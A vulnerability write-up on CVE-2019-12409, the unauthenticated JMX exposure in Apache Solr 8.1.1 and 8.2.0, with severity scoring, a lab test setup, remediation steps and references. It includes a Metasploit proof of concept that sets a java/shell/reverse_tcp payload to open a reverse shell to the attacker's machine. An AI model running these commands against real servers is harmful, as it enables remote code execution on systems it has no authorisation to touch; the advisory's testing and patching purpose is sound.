Description
The 8.1.1 and 8.2.0 releases of Apache Solr contain an insecure setting for the ENABLE_REMOTE_JMX_OPTS configuration option in the default solr.in.sh configuration file shipping with Solr. If you use the default solr.in.sh file from the affected releases, then JMX monitoring will be enabled and exposed on RMI_PORT (default=18983), without any authentication. If this port is opened for inbound traffic in your firewall, then anyone with network access to your Solr nodes will be able to access JMX, which may in turn allow them to upload malicious code for execution on the Solr server.
CVE ID : CVE-2019-12409 VCSS 3.X Severity and Metrics:
- NIST : NVD
- Base Score : 9.8 CRITICAL
- Vector : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Testing Vulnerability
Attacker :Kali linux (192.168.46.130)
Victim : Ubuntu 16.04.6 LTS (192.168.46.137) -> Docker_apache solr 8.1.1 (172.17.0.3)
Metasploit Poc
msf > use exploit/multi/misc/java_jmx_server
msf > set RHOSTS 192.168.46.137
msf > set RPORT 18983
msf > set LHOST 192.168.46.130
msf > set LPORT 9999
msf > set payload java/shell/reverse_tcp
msf > run
Solution
On November 18, Apache Solr revised the originally reported bug report after it was found that the flaw could lead to RCE. In addition, the Changelog highlighted this flaw as one of the fixes in Apache Solr version 8.3.
Per the security advisory, this vulnerability can also be remediated by setting the ENABLE_REMOTE_JMX_OPTS parameter to ’false’ in the solr.in.sh file. The change can be confirmed by ensuring the com.sun.management.jmxremote* properties are not listed in the Solr Admin interface under the Java Properties section.
References
- https://blog.alyac.co.kr/2631
- https://www.youtube.com/watch?v=KZtR6rYFG-E
- http://www.shangdixinxi.com/detail-1161011.html
- https://github.com/mogwaisec/mjet
- http://vulsee.com/archives/vulsee_2019/1119_9471.html
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12409
- https://nvd.nist.gov/vuln/detail/CVE-2019-12409#vulnCurrentDescriptionTitle